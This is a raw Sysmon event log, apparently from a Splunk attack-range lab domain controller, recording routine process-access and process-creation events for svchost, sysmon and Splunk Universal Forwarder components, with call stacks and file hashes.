13:35:26.232{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003090Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:26.232{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003089Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:26.232{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003088Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:26.232{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003087Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:26.232{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003086Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:26.232{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003085Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:26.232{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003084Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:26.232{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003083Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:26.232{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E9E-6005-8E00-00000000A301}4776C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003082Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:26.232{59A5CD1D-8E56-6005-3000-00000000A301}25323456C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8E9E-6005-8E00-00000000A301}4776C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003081Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:26.233{59A5CD1D-8E9E-6005-8E00-00000000A301}4776C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000003122Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:27.890{59A5CD1D-8E9F-6005-9000-00000000A301}43604572C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003121Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:27.749{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E9F-6005-9000-00000000A301}4360C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003120Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:27.749{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003119Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:27.749{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003118Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:27.749{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003117Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:27.749{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003116Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:27.749{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003115Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:27.749{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003114Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:27.749{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003113Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:27.749{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003112Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:27.749{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003111Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:27.749{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8E9F-6005-9000-00000000A301}4360C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003110Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:27.749{59A5CD1D-8E56-6005-3000-00000000A301}25323456C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8E9F-6005-9000-00000000A301}4360C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003109Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:27.751{59A5CD1D-8E9F-6005-9000-00000000A301}4360C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000003108Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:27.217{59A5CD1D-8E9F-6005-8F00-00000000A301}47324700C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003107Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:27.092{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E9F-6005-8F00-00000000A301}4732C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 